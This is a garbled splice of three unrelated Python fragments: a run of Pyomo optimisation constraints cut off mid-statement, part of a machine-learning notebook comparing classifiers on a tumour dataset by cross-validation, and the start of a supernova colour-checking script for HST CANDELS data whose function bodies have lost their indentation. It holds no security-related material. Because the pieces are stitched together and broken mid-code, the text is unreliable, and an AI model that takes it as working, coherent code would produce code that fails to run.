m.e3273 = Constraint(expr= m.x2013 + 3.5 * m.b2353 <= 3.5)
m.e3274 = Constraint(expr= m.x2014 + 3.5 * m.b2354 <= 3.5)
m.e3275 = Constraint(expr= m.x2015 + 3.5 * m.b2355 <= 3.5)
m.e3276 = Constraint(expr= m.x2016 + 3.5 * m.b2356 <= 3.5)
m.e3277 = Constraint(expr= m.x2073 - 3.15 * m.b2353 <= 0)
m.e3278 = Constraint(expr= m.x2074 - 3.15 * m.b2354 <= 0)
m.e3279 = Constraint(expr= m.x2075 - 3.15 * m.b2355 <= 0)
m.e3280 = Constraint(expr= m.x2076 - 3.15 * m.b2356 <= 0)
m.e3281 = Constraint(expr= m.x2077 + 3.15 * m.b2353 <= 3.15)
m.e3282 = Constraint(expr= m.x2078 + 3.15 * m.b2354 <= 3.15)
m.e3283 = Constraint(expr= m.x2079 + 3.15 * m.b2355 <= 3.15)
m.e3284 = Constraint(expr= m.x2080 + 3.15 * m.b2356 <= 3.15)
m.e3285 = Constraint(expr= -0.6 * m.x2017 + m.x2081 == 0)
m.e3286 = Constraint(expr= -0.6 * m.x2018 + m.x2082 == 0)
m.e3287 = Constraint(expr= -0.6 * m.x2019 + m.x2083 == 0)
m.e3288 = Constraint(expr= -0.6 * m.x2020 + m.x2084 == 0)
m.e3289 = Constraint(expr= m.x2021 == 0)
m.e3290 = Constraint(expr= m.x2022 == 0)
m.e3291 = Constraint(expr= m.x2023 == 0)
m.e3292 = Constraint(expr= m.x2024 == 0)
m.e3293 = Constraint(expr= m.x2085 == 0)
m.e3294 = Constraint(expr= m.x2086 == 0)
m.e3295 = Constraint(expr= m.x2087 == 0)
m.e3296 = Constraint(expr= m.x2088 == 0)
m.e3297 = Constraint(expr= m.x1445 - m.x2017 - m.x2021 == 0)
m.e3298 = Constraint(expr= m.x1446 - m.x2018 - m.x2022 == 0)
m.e3299 = Constraint(expr= m.x1447 - m.x2019 - m.x2023 == 0)
m.e3300 = Constraint(expr= m.x1448 - m.x2020 - m.x2024 == 0)
m.e3301 = Constraint(expr= m.x1469 - m.x2081 - m.x2085 == 0)
m.e3302 = Constraint(expr= m.x1470 - m.x2082 - m.x2086 == 0)
m.e3303 = Constraint(expr= m.x1471 - m.x2083 - m.x2087 == 0)
m.e3304 = Constraint(expr= m.x1472 - m.x2084 - m.x2088 == 0)
m.e3305 = Constraint(expr= m.x2017 - 3.5 * m.b2357 <= 0)
m.e3306 = Constraint(expr= m.x2018 - 3.5 * m.b2358 <= 0)
m.e3307 = Constraint(expr= m.x2019 - 3.5 * m.b2359 <= 0)
m.e3308 = Constraint(expr= m.x2020 - 3.5 * m.b2360 <= 0)
m.e3309 = Constraint(expr= m.x2021 + 3.5 * m.b2357 <= 3.5)
m.e3310 = Constraint(expr= m.x2022 + 3.5 * m.b2358 <= 3.5)
m.e3311 = Constraint(expr= m.x2023 + 3.5 * m.b2359 <= 3.5)
m.e3312 = Constraint(expr= m.x2024 + 3.5 * m.b2360 <= 3.5)
m.e3313 = Constraint(expr= m.x2081 - 2.1 * m.b2357 <= 0)
m.e3314 = Constraint(expr= m.x2082 - 2.1 * m.b2358 <= 0)
m.e3315 = Constraint(expr= m.x2083 - 2.1 * m.b2359 <= 0)
m.e3316 = Constraint(expr= m.x2084 - 2.1 * m.b2360 <= 0)
m.e3317 = Constraint(expr= m.x2085 + 2.1 * m.b2357 <= 2.1)
m.e3318 = Constraint(expr= m.x2086 + 2.1 * m.b2358 <= 2.1)
m.e3319 = Constraint(expr= m.x2087 + 2.1 * m.b2359 <= 2.1)
m.e3320 = Constraint(expr= m.x2088 + 2.1 * m.b2360 <= 2.1)
m.e3321 = Constraint(expr= (m.x2089 / (0.001 + 0.999 * m.b2361) - 1.1 * log(
m.x2025 / (0.001 + 0.999 * m.b2361) + 1)) * (0.001 + 0.999 * m.b2361) <= 0)
m.e3322 = Constraint(expr= (m.x2090 / (0.001 + 0.999 * m.b2362) - 1.1 * log(
m.x2026 / (0.001 + 0.999 * m.b2362) + 1)) * (0.001 + 0.999 * m.b2362) <= 0)
m.e3323 = Constraint(expr= (m.x2091 / (0.001 + 0.999 * m.b2363) - 1.1 * log(
m.x2027 / (0.001 + 0.999 * m.b2363) + 1)) * (0.001 + 0.999 * m.b2363) <= 0)
m.e3324 = Constraint(expr= (m.x2092 / (0.001 + 0.999 * m.b2364) - 1.1 * log(
m.x2028 / (0.001 + 0.999 * m.b2364) + 1)) * (0.001 + 0.999 * m.b2364) <= 0)
m.e3325 = Constraint(expr= m.x2029 == 0)
m.e3326 = Constraint(expr= m.x2030 == 0)
m.e3327 = Constraint(expr= m.x2031 == 0)
m.e3328 = Constraint(expr= m.x2032 == 0)
m.e3329 = Constraint(expr= m.x2093 == 0)
m.e3330 = Constraint(expr= m.x2094 == 0)
m.e3331 = Constraint(expr= m.x2095 == 0)
m.e3332 = Constraint(expr= m.x2096 == 0)
m.e3333 = Constraint(expr= m.x1449 - m.x2025 - m.x2029 == 0)
m.e3334 = Constraint(expr= m.x1450 - m.x2026 - m.x2030 == 0)
m.e3335 = Constraint(expr= m.x1451 - m.x2027 - m.x2031 == 0)
m.e3336 = Constraint(expr= m.x1452 - m.x2028 - m.x2032 == 0)
m.e3337 = Constraint(expr= m.x1473 - m.x2089 - m.x2093 == 0)
m.e3338 = Constraint(expr= m.x1474 - m.x2090 - m.x2094 == 0)
m.e3339 = Constraint(expr= m.x1475 - m.x2091 - m.x2095 == 0)
m.e3340 = Constraint(expr= m.x1476 - m.x2092 - m.x2096 == 0)
m.e3341 = Constraint(expr= m.x2025 - 3.5 * m.b2361 <= 0)
m.e3342 = Constraint(expr= m.x2026 - 3.5 * m.b2362 <= 0)
m.e3343 = Constraint(expr= m.x2027 - 3.5 * m.b2363 <= 0)
m.e3344 = Constraint(expr= m.x2028 - 3.5 * m.b2364 <= 0)
m.e3345 = Constraint(expr= m.x2029 + 3.5 * m.b2361 <= 3.5)
m.e3346 = Constraint(expr= m.x2030 + 3.5 * m.b2362 <= 3.5)
m.e3347 = Constraint(expr= m.x2031 + 3.5 * m.b2363 <= 3.5)
m.e3348 = Constraint(expr= m.x2032 + 3.5 * m.b2364 <= 3.5)
m.e3349 = Constraint(expr= m.x2089 - 1.6544851364539 * m.b2361 <= 0)
m.e3350 = Constraint(expr= m.x2090 - 1.6544851364539 * m.b2362 <= 0)
m.e3351 = Constraint(expr= m.x2091 - 1.6544851364539 * m.b2363 <= 0)
m.e3352 = Constraint(expr= m.x2092 - 1.6544851364539 * m.b2364 <= 0)
m.e3353 = Constraint(expr= m.x2093 + 1.6544851364539 * m.b2361
<= 1.6544851364539)
m.e3354 = Constraint(expr= m.x2094 + 1.6544851364539 * m.b2362
<= 1.6544851364539)
m.e3355 = Constraint(expr= m.x2095 + 1.6544851364539 * m.b2363
<= 1.6544851364539)
m.e3356 = Constraint(expr= m.x2096 + 1.6544851364539 * m.b2364
<= 1.6544851364539)
m.e3357 = Constraint(expr= -0.9 * m.x2037 + m.x2169 == 0)
m.e3358 = Constraint(expr= -0.9 * m.x2038 + m.x2170 == 0)
m.e3359 = Constraint(expr= -0.9 * m.x2039 + m.x2171 == 0)
m.e3360 = Constraint(expr= -0.9 * m.x2040 + m.x2172 == 0)
m.e3361 = Constraint(expr= -m.x2113 + m.x2169 == 0)
m.e3362 = Constraint(expr= -m.x2114 + m.x2170 == 0)
m.e3363 = Constraint(expr= -m.x2115 + m.x2171 == 0)
m.e3364 = Constraint(expr= -m.x2116 + m.x2172 == 0)
m.e3365 = Constraint(expr= m.x2045 == 0)
m.e3366 = Constraint(expr= m.x2046 == 0)
m.e3367 = Constraint(expr= m.x2047 == 0)
m.e3368 = Constraint(expr= m.x2048 == 0)
m.e3369 = Constraint(expr= m.x2117 == 0)
m.e3370 = Constraint(expr= m.x2118 == 0)
m.e3371 = Constraint(expr= m.x2119 == 0)
m.e3372 = Constraint(expr= m.x2120 == 0)
m.e3373 = Constraint(expr= m.x2173 == 0)
m.e3374 = Constraint(expr= m.x2174 == 0)
m.e3375 = Constraint(expr= m.x2175 == 0)
m.e3376 = Constraint(expr= m.x2176 == 0)
m.e3377 = Constraint(expr= m.x1453 - m.x2037 - m.x2045 == 0)
m.e3378 = Constraint(expr= m.x1454 - m.x2038 - m.x2046 == 0)
m.e3379 = Constraint(expr= m.x1455 - m.x2039 - m.x2047 == 0)
m.e3380 = Constraint(expr= m.x1456 - m.x2040 - m.x2048 == 0)
m.e3381 = Constraint(expr= m.x1485 - m.x2113 - m.x2117 == 0)
m.e3382 = Constraint(expr= m.x1486 - m.x2114 - m.x2118 == 0)
m.e3383 = Constraint(expr= m.x1487 - m.x2115 - m.x2119 == 0)
m.e3384 = Constraint(expr= m.x1488 - m.x2116 - m.x2120 == 0)
m.e3385 = Constraint(expr= m.x1517 - m.x2169 - m.x2173 == 0)
m.e3386 = Constraint(expr= m.x1518 - m.x2170 - m.x2174 == 0)
m.e3387 = Constraint(expr= m.x1519 - m.x2171 - m.x2175 == 0)
m.e3388 = Constraint(expr= m.x1520 - m.x2172 - m.x2176 == 0)
m.e3389 = Constraint(expr= m.x2037 - 0.542802524296876 * m.b2365 <= 0)
m.e3390 = Constraint(expr= m.x2038 - 0.542802524296876 * m.b2366 <= 0)
m.e3391 = Constraint(expr= m.x2039 - 0.542802524296876 * m.b2367 <= 0)
m.e3392 = Constraint(expr= m.x2040 - 0.542802524296876 * m.b2368 <= 0)
m.e3393 = Constraint(expr= m.x2045 + 0.542802524296876 * m.b2365
<= 0.542802524296876)
m.e3394 = Constraint(expr= m.x2046 + 0.542802524296876 * m.b2366
<= 0.542802524296876)
m.e3395 = Constraint(expr= m.x2047 + 0.542802524296876 * m.b2367
<= 0.542802524296876)
m.e3396 = Constraint(expr= m.x2048 + 0.542802524296876 * m.b2368
<= 0.542802524296876)
m.e3397 = Constraint(expr= m.x2113 - 7 * m.b2365 <= 0)
m.e3398 = Constraint(expr= m.x2114 - 7 * m.b2366 <= 0)
m.e3399 = Constraint(expr= m.x2115 - 7 * m.b2367 <= 0)
m.e3400 = Constraint(expr= m.x2116 - 7 * m.b2368 <= 0)
m.e3401 = Constraint(expr= m.x2117 + 7 * m.b2365 <= 7)
m.e3402 = Constraint(expr= m.x2118 + 7 * m.b2366 <= 7)
m.e3403 = Constraint(expr= m.x2119 + 7 * m.b2367 <= 7)
m.e3404 = Constraint(expr= m.x2120 + 7 * m.b2368 <= 7)
m.e3405 = Constraint(expr= m.x2169 - 7 * m.b2365 <= 0)
m.e3406 = Constraint(expr= m.x2170 - 7 * m.b2366 <= 0)
m.e3407 = Constraint(expr= m.x2171 - 7 * m.b2367 <= 0)
m.e3408 = Constraint(expr= m.x2172 - 7 * m.b2368 <= 0)
m.e3409 = Constraint(expr= m.x2173 + 7 * m.b2365 <= 7)
m.e3410 = Constraint(expr= m.x2174 + 7 * m.b2366 <= 7)
m.e3411 = Constraint(expr= m.x2175 + 7 * m.b2367 <= 7)
m.e3412 = Constraint(expr= m.x2176 + 7 * m.b2368 <= 7)
m.e3413 = Constraint(expr= (m.x2177 / (0.001 + 0.999 * m.b2369) - log(m.x2053
/ (0.001 + 0.999 * m.b2369) + 1)) * (0.001 + 0.999 * m.b2369) <= 0)
m.e3414 = Constraint(expr= (m.x2178 / (0.001 + 0.999 * m.b2370) - log(m.x2054
/ (0.001 + 0.999 * m.b2370) + 1)) * (0.001 + 0.999 * m.b2370) <= 0)
m.e3415 =
res_knn_brute]
barras = ('Auto','Ball Tree','Kd tree','Brute')
y_pos = np.arange(len(barras))
plt.bar(y_pos, alto, color=['pink', 'yellow', 'purple', 'cyan'])
plt.xticks(y_pos, barras)
plt.show()
# #### Analysis
#
# * It is not possible to determine which algorithm is best: once these algorithms are used and the first one has been run, it is very common for the remaining ones to give exactly the same results (this happens a lot with KNN), so there is no clear basis for choosing one over the others.
# #### 2. Which algorithm would you use, based on the information obtained in the two previous exercises?
# #### Analysis:
#
# * Since in KNN it is common that, once the model has been run, changing the algorithm gives the same results, I would use any of them (for this specific case). But to really see which one is best, each algorithm would have to be calibrated in isolation to check which one gives the better predictive power; a minimal sketch of that per-algorithm check is shown below.
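# A minimal sketch of how each KNN `algorithm` option could be cross-validated in isolation (assuming `X` and `y` are the same predictors and target used in the cells above):
# In[ ]:
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import KFold, cross_val_score
for algoritmo in ['auto', 'ball_tree', 'kd_tree', 'brute']:
    instancia_kfold = KFold(n_splits=5)
    # a fresh classifier per run, so no fitted state is shared between algorithms
    porcentajes = cross_val_score(KNeighborsClassifier(algorithm=algoritmo), X, y.iloc[:,0].values, cv=instancia_kfold)
    print("{}: {:.2f}".format(algoritmo, porcentajes.mean()))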
# ## Question 4:
# #### For this question we will also use the tumores.csv data
# #### 1. The goal of this exercise is to compare all the predictive methods seen in the course on this data table. Here the aim is to predict the variable tipo. To do so, generate 5-fold cross-validations for the methods SVM, KNN, Decision Trees, Random Forests, ADA Boosting, eXtreme Gradient Boosting, Bayes, LDA, QDA and Neural Networks from the MLPClassifier package. For KNN and Random Forests use the parameters obtained in the calibrations performed in the previous exercises (in theory every method should be calibrated). Then make a bar chart to compare the methods. Can the best method be clearly determined? Use KFold from sklearn.
# #### Decision Trees with criterion "gini"
# In[63]:
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import KFold, cross_val_score
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(DecisionTreeClassifier(criterion = 'gini'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_arbol_gini = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Decision Trees with criterion "entropy"
# In[64]:
from sklearn.tree import DecisionTreeClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(DecisionTreeClassifier(criterion = 'entropy'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_arbol_entropy = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Boosting (ADA Boosting), algorithm "SAMME.R"
# In[65]:
from sklearn.ensemble import AdaBoostClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(AdaBoostClassifier(algorithm = "SAMME.R", n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_potenciacion_sammer = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Boosting (ADA Boosting), algorithm "SAMME"
# In[66]:
from sklearn.ensemble import AdaBoostClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(AdaBoostClassifier(algorithm = "SAMME", n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_potenciacion_samme = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Extreme Gradient Boosting (sklearn GradientBoostingClassifier), criterion "friedman_mse"
# In[70]:
from sklearn.ensemble import GradientBoostingClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GradientBoostingClassifier(criterion = 'friedman_mse', n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_xg_potenciacion_friedman = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Extreme Gradient Boosting (sklearn GradientBoostingClassifier), criterion "mse"
# In[71]:
from sklearn.ensemble import GradientBoostingClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GradientBoostingClassifier(criterion = 'mse', n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_xg_potenciacion_mse = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Extreme Gradient Boosting (sklearn GradientBoostingClassifier), criterion "mae"
# In[73]:
from sklearn.ensemble import GradientBoostingClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GradientBoostingClassifier(criterion = 'mae', n_estimators=10), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_xg_potenciacion_mae = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Support Vector Machines, kernel "sigmoid"
# In[74]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='sigmoid', gamma = 'scale'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_sigmoid= porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Support Vector Machines, kernel "rbf"
# In[75]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='rbf', gamma = 'scale'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_rbf= porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Support Vector Machines, kernel "poly"
# In[77]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='poly', gamma = 'scale'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_poly = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Support Vector Machines, kernel "linear" (max_iter=250000 is used so it does not run for too long).
# In[79]:
from sklearn.svm import SVC
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(SVC(kernel='linear', gamma = 'scale',max_iter=250000), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_svm_linear = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Neural Networks - MLPClassifier, activation = "identity"
# In[80]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'identity', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_iden = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Neural Networks - MLPClassifier, activation = "logistic"
# In[81]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'logistic', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_logis = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Neural Networks - MLPClassifier, activation = "tanh"
# In[82]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'tanh', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_tahn = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Neural Networks - MLPClassifier, activation = "relu"
# In[83]:
from sklearn.neural_network import MLPClassifier
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(MLPClassifier(activation = 'relu', solver='lbfgs'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_redes_MLP_relu = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Naive Bayes
# In[84]:
from sklearn.naive_bayes import GaussianNB
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(GaussianNB(), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_bayes = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Linear Discriminant Analysis, solver = "eigen"
# In[91]:
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(LinearDiscriminantAnalysis(solver = 'eigen', shrinkage = 'auto'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_dis_lineal_eigen = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Linear Discriminant Analysis, solver = "lsqr"
# In[92]:
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(LinearDiscriminantAnalysis(solver = 'lsqr', shrinkage = 'auto'), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_dis_lineal_lsqr = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Quadratic Discriminant Analysis
# In[97]:
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
instancia_kfold = KFold(n_splits=5)
porcentajes = cross_val_score(QuadraticDiscriminantAnalysis(), X, y.iloc[:,0].values, cv=instancia_kfold)
print("Porcentaje de detección por grupo:\n{}".format(porcentajes))
res_dis_cuadratico = porcentajes.mean()
print("Promedio de detección: {:.2f}".format(porcentajes.mean()))
# #### Comparison Chart
# In[137]:
plt.figure(figsize=(38,20))
alto = [res_bosques_gini, res_bosques_entropy , res_knn_auto, res_knn_ball , res_knn_kd, res_knn_brute, res_arbol_gini , res_arbol_entropy, res_potenciacion_sammer , res_potenciacion_samme, res_xg_potenciacion_friedman, res_xg_potenciacion_mse, res_xg_potenciacion_mae, res_svm_sigmoid, res_svm_rbf, res_svm_poly, res_svm_linear, res_redes_MLP_iden , res_redes_MLP_logis, res_redes_MLP_tahn, res_redes_MLP_relu, res_bayes, res_dis_lineal_eigen, res_dis_lineal_lsqr, res_dis_cuadratico]
barras = ('RF Gini', 'RF Entro', 'KNN auto', 'KNN ball', 'KNN kd', 'KNN brute', 'Arbol Gini', 'Arbol Entro', 'ADA Samme R', 'ADA Samme', 'XG Friedman', 'XG mse' , 'XG Mae', 'SVM Sigmo', 'SVM RBF', 'SVM Poly', 'SVM linear', 'Redes Iden','Redes Logis', 'Redes Tanh', 'Redes Relu', 'Bayes', 'Dis Lin Eigen', 'Dis Lin lsqr', 'Dis cuadra')
y_pos = np.arange(len(barras))
plt.bar(y_pos, alto,color = ["#67E568","#257F27","#08420D","#FFF000","#FFB62B","#E56124","#E53E30","#7F2353","#F911FF","#9F8CA6",'aqua', 'navy', 'plum', 'pink', 'skyblue', 'purple', 'indigo', 'blueviolet', 'crimson', 'coral', 'peru', 'cadetblue', 'gold', 'darkseagreen', 'greenyellow']
)
plt.xticks(y_pos, barras)
plt.show()
# #### Analysis
#
# * Running the cross-validation with all the methods seen in the course, the ones that give the best results are:
# * Random Forest with the Gini and entropy criteria.
# * Neural networks using the identity activation.
# * Quadratic Discriminant Analysis.
# * And finally Bayes.
# #### 2. Can the Neural Networks from the Keras package be included in this comparison? If the answer is yes, include them.
# In[140]:
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
# function to create the model, required by KerasClassifier
def create_model():
    # create the model
    model = Sequential()
    model.add(Dense(12, input_dim=17, activation='relu'))
    model.add(Dense(8, activation='relu'))
    model.add(Dense(1, activation='sigmoid'))
    # compile the model
    model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
    return model
# fix the random seed for reproducibility
seed = 7
np.random.seed(seed)
# load the data
dataset = pd.read_csv("tumores.csv", delimiter = ',', decimal = '.')
# convert the variable from object to categorical
dataset['imagen'] = dataset['imagen'].astype('category')
# recode the categories as numbers
dataset["imagen"] = dataset["imagen"].cat.codes
# convert the variable from integer back to categorical
dataset['imagen'] = dataset['imagen'].astype('category')
# split into predictor variables (X) and target variable (y)
X = dataset.iloc[:,0:17]
Y = dataset.iloc[:,17:18]
# build the classifier
model = KerasClassifier(build_fn=create_model, epochs=150, batch_size=10, verbose=0)
# evaluate using 5-fold cross-validation
kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=seed)
results = cross_val_score(model, X, Y, cv=kfold)
print(results.mean())
# store the result for the chart
res_keras = results.mean()
# #### Comparison chart including the Keras cross-validation
# In[141]:
plt.figure(figsize=(38,20))
alto = [res_bosques_gini, res_bosques_entropy , res_knn_auto, res_knn_ball , res_knn_kd, res_knn_brute, res_arbol_gini , res_arbol_entropy, res_potenciacion_sammer , res_potenciacion_samme, res_xg_potenciacion_friedman, res_xg_potenciacion_mse, res_xg_potenciacion_mae, res_svm_sigmoid, res_svm_rbf, res_svm_poly, res_svm_linear, res_redes_MLP_iden , res_redes_MLP_logis, res_redes_MLP_tahn, res_redes_MLP_relu, res_bayes, res_dis_lineal_eigen, res_dis_lineal_lsqr, res_dis_cuadratico, res_keras]
barras = ('RF Gini', 'RF Entro', 'KNN auto', 'KNN ball', 'KNN kd', 'KNN brute', 'Arbol Gini', 'Arbol Entro', 'ADA Samme R', 'ADA Samme', 'XG Friedman', 'XG mse' , 'XG Mae', 'SVM Sigmo', 'SVM RBF', 'SVM Poly', 'SVM linear', 'Redes Iden','Redes Logis', 'Redes Tanh', 'Redes Relu', 'Bayes', 'Dis Lin Eigen', 'Dis Lin lsqr', 'Dis cuadra', 'Redes keras')
y_pos = np.arange(len(barras))
plt.bar(y_pos, alto,color = ["#67E568","#257F27","#08420D","#FFF000","#FFB62B","#E56124","#E53E30","#7F2353","#F911FF","#9F8CA6",'aqua', 'navy', 'plum', 'pink', 'skyblue', 'purple', 'indigo', 'blueviolet', 'crimson', 'coral', 'peru', 'cadetblue', 'gold', 'darkseagreen', 'greenyellow', 'teal']
)
plt.xticks(y_pos, barras)
plt.show()
# #### 3. Which method would you use, based on the information obtained in the two previous exercises?
# #### Analysis
#
#
# 2013.04.26
# S.Rodney
# checking if the simulated SN distributions are in line with the observed
# mags and colors for 0.5 < z < 1.0
# TODO: handle upper limits
# TODO : handle missing nicknames
# TODO : adjust default x scaling
import os
import sys
import stardust
import numpy as np
from matplotlib import pyplot as pl
from matplotlib import patches
sndataroot = os.environ['SNDATA_ROOT']
DATFILELIST = [
'HST_CANDELS1_adams.dat',
'HST_CANDELS1_agnew.dat',
'HST_CANDELS1_aidan.dat',
'HST_CANDELS1_benjamin.dat',
'HST_CANDELS1_buchanan.dat',
'HST_CANDELS1_bush.dat',
'HST_CANDELS1_carter.dat',
'HST_CANDELS1_cleveland.dat',
'HST_CANDELS1_clinton.dat',
'HST_CANDELS1_eisenhower.dat',
'HST_CANDELS1_fdr.dat',
'HST_CANDELS1_ford.dat',
'HST_CANDELS1_garfield.dat',
'HST_CANDELS1_grant.dat',
'HST_CANDELS1_harrison.dat',
'HST_CANDELS1_hayes.dat',
'HST_CANDELS1_herbert.dat',
'HST_CANDELS1_hoover.dat',
'HST_CANDELS1_humphrey.dat',
'HST_CANDELS1_jackson.dat',
'HST_CANDELS1_jefferson.dat',
'HST_CANDELS1_johnson.dat',
'HST_CANDELS1_kennedy.dat',
'HST_CANDELS1_lbj.dat',
'HST_CANDELS1_lincoln.dat',
'HST_CANDELS1_madison.dat',
'HST_CANDELS1_mckinley.dat',
'HST_CANDELS1_mikulski.dat',
'HST_CANDELS1_mondale.dat',
'HST_CANDELS1_pierce.dat',
'HST_CANDELS1_polk.dat',
'HST_CANDELS1_primo.dat',
'HST_CANDELS1_quayle.dat',
'HST_CANDELS1_quincy.dat',
'HST_CANDELS1_reagan.dat',
'HST_CANDELS1_rockefeller.dat',
'HST_CANDELS1_roosevelt.dat',
'HST_CANDELS1_taylor.dat',
'HST_CANDELS1_truman.dat',
'HST_CANDELS1_tumbleweed.dat',
'HST_CANDELS1_vanburen.dat',
'HST_CANDELS1_washington.dat',
'HST_CANDELS1_wilson.dat',
'HST_CANDELS1_workman.dat',
]
def colorcheck_midz1():
datfilelist1 = [
'HST_CANDELS1_taylor.dat',
'HST_CANDELS1_pierce.dat',
'HST_CANDELS1_ford.dat',
'HST_CANDELS1_eisenhower.dat',
'HST_CANDELS1_garfield.dat',
]
fig = pl.figure( 1, figsize=(19,12) )
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
pl.clf()
fig = pl.figure( 2, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist1) :
colorCheck( datfile, 5, irow, [1,2] )
def colorcheck_midz2():
datfilelist2 = [
'HST_CANDELS1_workman.dat',
'HST_CANDELS1_roosevelt.dat',
'HST_CANDELS1_jackson.dat',
'HST_CANDELS1_buchanan.dat',
'HST_CANDELS1_reagan.dat',
]
fig = pl.figure( 3, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
fig = pl.figure( 4, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist2) :
colorCheck( datfile, 5, irow, [3,4] )
def colorcheck_midz3():
datfilelist3 = [
'HST_CANDELS1_harrison.dat',
'HST_CANDELS1_fdr.dat',
